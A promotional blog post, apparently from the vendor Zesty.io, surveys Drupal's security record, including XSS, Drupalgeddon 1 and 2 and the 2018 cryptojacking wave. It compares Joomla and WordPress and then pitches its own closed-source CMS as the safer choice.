Drupal Security Reviews: Drupal Security Vulnerabilities Compared & Explained
Drupal has been providing its open source CMS platform since 2001. The platform has managed to gain a dedicated fan-base who will stand by Drupal through thick and thin, with many users mentioning how Drupal is one of the most secure open source CMS platforms that is out there.
Drupal developers that were once faithful to the platform, are now making moves to leave Drupal behind, but for what reason? A more obvious cause could be regarding the recent news of Drupalgeddon 2, leading to the common question: Where does Drupal sit on the security scale?
History of Drupal Security
Since 2005, Drupal has had 312 documented vulnerabilities, with 3 of them being knowingly exploited. Based on our experience, this number of known exploitation should be higher.
Greg James Kanddison, a Drupal expert who wrote the book Cracking Drupal: A Drop in the Bucket which reveals the vulnerabilities and security issues in a site that has been built on Drupal and how to prevent them, looked into all the documented vulnerabilities and found that cross-site scripting (XSS) to be the most common issue.
XSS is where hackers inject client-side scripts into web pages that are viewed by other users. Drupal community members as early as 2007 shared their experiences of how their site was hacked via XSS. One user, kayblaino, posted on Drupal’s community forum to share how he came to find his site was hacked by “The Mafia Hacking Team” who removed every file in his site’s root directory.
Looking through the comments for that particular forum post, Drupal community members could only suggest keeping a lookout for the latest security updates to prevent the site from being hacked in the first place. One of San Diego’s largest amusement parks faced the headache of having their Drupal site hacked in just the past year.
While the intention of advising fellow Drupal community members to look out for the latest security updates is all and well, the problem lies in actually trying to install the security patch. Drupal doesn’t install it for you, you have to do it yourself.
Due to time constraints and resources, not everyone can install the latest security updates straightaway. There are alternatives likes ours that require zero manual security patches, be sure to check out your other options before taking the risk.
Back in mid-October 2014, Drupal had a severe security issue that arose due to a flaw found in a single line of code. This tiny coding flaw enabled hackers to access databases of vulnerable sites to manipulate or delete the data.
The worst thing is, this issue first came about back in November 2013. But it wasn’t until September 2014 when Drupal’s security team got a report about the issue from SektionEins, a German company who came across it while auditing a client’s site.
One notable victim from Drupalgeddon 1 was the Indiana Department of Education’s website. Even though there was no sign of data being compromised, users did receive a rather bizarre error message which said the site had been hacked by the “Nigerian Cyber Army”.
Most recently in March 2018, Drupal released an emergency patch to fix a “highly critical” flaw in Drupal versions 6, 7 and 8. The flaw allowed for hackers to take over a vulnerable site by simply visiting it.
Over 1 million sites were at risk, and it caused panic. One Reddit user, a web developer, received a frantic email from a Drupal user, who didn’t update their site in two years, asking for help.
“A non-profit that I used to volunteer for emailed me frantically asking if I can help them, saying they were hacked. I am not a Drupal guy, but through some online scanners and looking up the problem, I am pretty sure they got hit with Drupalgeddon 2, since they hadn't updated Drupal in two years and were still on 7.5. However, googling this problem, the main solution just seems to be to delete everything and to restore a clean backup.”
To make matters worse, two whole months after Drupalgeddon2 struck, Drupal — and more importantly, Drupal’s user base — was still reeling from the bug. In May 2018, over 400 big-named Drupal sites, including Lenovo, San Diego Zoo, and the University of California were Cryptojacked.
What Do Drupal Users Say?
You don’t have to look far to find out what other Drupal users have to say about security. One G2crowd reviewer had this to say about Drupal’s security:
“Drupal is high maintenance. It scales well and is very capable, and very easy to modify. The price you pay for this kind of flexibility is that it requires a rather large skill set to run it professionally and/or considerable (wo)manpower to keep it fast and secure. All of my Drupal sites were hacked eventually because I wasn't able to install the updates in time.”
Another G2crowd review had this to say:
“You need to plan for regularly updating the software, as there are frequent security patches in Drupal that need to be installed.”
Furthermore, a reviewer for Trust Radius had this to say:
“Security is an ongoing struggle for all users of open source CMS solutions. If you choose Drupal for your website, you will need a plan for security updates to ensure you are one step ahead of the hackers.”
To get the overall picture of what these users are trying to say is that if you want to have a Drupal site that is secure, you will have to install updates and security patches on a regular basis. Ultimately, how secure your Drupal site is your responsibility. If for whatever reason you are not able to install the security update, then your Drupal site is at risk of being attacked.
If Drupal Is No Good, What About WordPress or Joomla?
In comparison, the infamous CMS systems like Joomla and WordPress don’t fare much better than Drupal. In some cases, it is even worse.
Joomla has had 226 vulnerabilities since 2005 with 135 of them have been knowingly exploited. However, only 10 documented vulnerabilities occurred in 2014. Joomla was very vulnerable to attacks from 2005 to 2010.
Since 2010, Joomla has since seen fewer vulnerabilities and even fewer exploits. It did, however, have a major vulnerability back in 2013 that could have affected 1 in 10 Joomla sites, but this was resolved.
Despite having a dedicated security team that has been reassuringly labeled Joomla Security Strike Team (JSST), you will still have to regularly update your site manually to prevent your site being exposed to any threats.
As for WordPress, despite having 30 percent of the internet, it has had 301 documented vulnerabilities since 2005, out of which 43 have been knowingly exploited. In 2014 alone, there were 29 documented vulnerabilities.
Out of the vulnerabilities that were discovered in 2014, 23 were core WordPress vulnerabilities, and the rest were plug-in vulnerabilities. Well-known WordPress plug-ins are often targeted by hackers since they are less secure and has the potential to affect a large number of sites. Popular plugins such as RevSlider, FancyBox, WPTouch and MailPoet have been affected in the past.
What’s the Alternative?
It is important to keep in mind that Drupal, WordPress and Joomla are open source platforms and can be free to use. For enterprises, an open source platform can often present a security concern since they are not developed or maintained within a controlled environment.
Open source platforms are usually created by a community of developers from around the world. With so many users developing the platform, you will come across inconsistencies due to lack of effective communication between developers. On top of that, the software is not always peer-reviewed. This leaves the door open to malicious attacks.
On the other hand, closed software is, in general, more secure as it is developed in a controlled environment by a dedicated team. Only this team can view and edit the source code, which is regularly audited for any flaws in the coding.
Zesty.io is a closed source CMS solution with a clean security record. And unlike Drupal, Joomla and WordPress, you don’t have to install security patches or updates, because Zesty.io does that for you. Leaving you with more time to focus on growing your business. We suggest continuing to view your options with a keen eye on security benefits and how they impact costs/data over time.
By Gisele Blair
A designer knows he has achieved perfection not when there is nothing left to add, but when there is nothing left to take away.